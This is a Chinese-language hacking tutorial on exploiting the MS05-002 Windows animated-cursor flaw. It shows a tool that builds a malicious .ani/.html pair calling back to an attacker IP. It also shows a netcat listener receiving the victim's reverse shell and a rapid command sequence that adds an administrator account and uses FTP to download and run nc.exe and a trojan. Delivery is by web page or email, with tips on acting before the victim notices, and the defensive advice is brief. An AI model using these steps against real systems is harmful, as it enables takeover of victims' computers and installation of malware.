一,漏洞简介:
处理光标、动画光标和图标格式的方式中存在远程执行代码漏洞。 攻击者可以通过构建恶意光标/图标来利用此漏洞,如果用户访问了恶意网站或查看了恶意的电子邮件,此漏洞就可能允许远程执行代码。 成功利用此漏洞的攻击者可以完全控制受影响的系统。
Microsoft 安全公告 MS05-002
光标和图标格式处理中的漏洞可能允许远程执行代码 (891711)
发布时间:2005 年 1 月 11 日
更新时间:2005 年 3 月 8 日
版本:1.2
摘要
本文档的目标读者:使用 Microsoft Windows 的客户
漏洞的影响:远程执行代码
最高严重等级:严重
建议:用户应立即应用此更新。
安全更新替代:本公告替代以前的一个安全更新。 有关详细信息,请参见本公告的“常见问题解答 (FAQ)”部分。
注意事项:无
测试过的软件和安全更新下载位置:
受影响的软件:
? Microsoft Windows NT Server 4.0 Service Pack 6a
? Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6
? Microsoft Windows 2000 Service Pack 3 和 Microsoft Windows 2000 Service Pack 4
? Microsoft Windows XP Service Pack 1
? Microsoft Windows XP 64-Bit Edition Service Pack 1
? Microsoft Windows XP 64-Bit Edition Version 2003
? Microsoft Windows Server 2003
? Microsoft Windows Server 2003 64-Bit Edition
? Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE) 和 Microsoft Windows Millennium Edition (ME)
不受影响的软件:
? Microsoft Windows XP Service Pack 2
二.生成攻击代码!
先在本站下载攻击工具.
解压在C:\根目录
运行cmd.exe
C:\>ms05002.exe
Usage:
ms05002.exe <file> <connect back ip> <connect back port>
使用方法 :
file 生成的文件名
connect back ip 反向连接ip
connect back port 反向连接端口
C:\>ms05002.exe test 211.147.7.150 80
(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit
Copyright (c) 2004-2005 .: houseofdabus :.
rewritten by 无敌最寂寞@EST
Tested on all affected systems:
[+] Windows Server 2003
[+] Windows XP SP1, SP0
[+] Windows 2000 All SP
This is provided as proof-of-concept code only for educational purposes and test
ing by authorized individuals with permission to do so.
[*] Creating test.ani file ... Ok
[*] Creating test.html file ... Ok
这样在C:\根目录下生成了两个文件 test.html 与 test.ani
到此我们的攻击代码已经生成完毕.
三,模拟攻击
将test.html 与 test.ani 上传到网站.
我们在本地监听 80端口
C:\>nc -vv -l -p 80
listening on [any] 80 ...
当有人浏览或者是打开test.html之后.
C:\>nc -l -p 80 -v
listening on [any] 80 ...
221.9.150.31: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [211.147.7.150] from (UNKNOWN) [221.9.150.31] 1224: NO_DATA
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\Documents and Settings\admin\桌面>
我们已经得到一个shell,可以上传木马和控制对方了.
四,实践
测试成功就能用于实践吗?不是的.还有几个问题要解决.
1,此漏洞对方浏览之后ie 会出问题,发现率80%
2,目标浏览test.html 会弹出窗口.
所以总结,浏览test.html 对方很可能在 1至5秒之间发现.(当然不包括那些病毒是什么都不知道的菜鸟)
我们要在对方反应过来有问题的时间,就给他中上木马.
如上面我们模拟攻击.
C:\>nc -l -p 80 -v
listening on [any] 80 ...
221.9.150.31: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [211.147.7.150] from (UNKNOWN) [221.9.150.31] 1224: NO_DATA
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\Documents and Settings\admin\桌面>
你不太可能手动打命令在 1-3秒之内,完成下载木马.
所以写了一个工具.
如图:
当有人连接80端口,发送我们之前已经写好的命令.下载到本地执行这样就很快了.
我测试一般在2秒之内完了全部操作.
一般执行
net user aa aa /add
net LOCALGROUP administrators aa /add
echo open 211.147.7.150>>zy.txt
echo public>>zy.txt
echo public>>zy.txt
echo bin>>zy.txt
echo get nc.exe>>zy.txt
echo bye>>zy.txt
ftp -s:zy.txt
XXX.exe
最后发送一个 exit,关闭80,重新监听80.
这些命令,2秒之内能执行完成.不过,ftp下载,这个要看对方的网速了.
我们可以用一些比较小的木马.传上去执行.
到些,我们只要将软件运行在服务器上,test.html 可以用来当网页木马用.
也可以通过邮件发送目标用户.只要目标用户打开邮件,就可以中招.
漏洞无处不在,人在网上飘.多注意安全.黑客攻击的总是那些懒散的管理员.
如果您经常更新杀毒软件,更新系统补丁.还有常来我们网站看看了解最新漏洞资讯.完全可以保证你主机的安全.
我们更多的是关注技术。提醒攻击主机是非法的。
有问题来我们论坛提问http://bbs.77169.com,相关软件 请在本站下载系统中搜索.
五:安全防范
1,安装杀毒软件,更新最新的杀毒软件.
2,更新 Service Pack ,让你的操作系统保持最新.可以防范此类攻击.
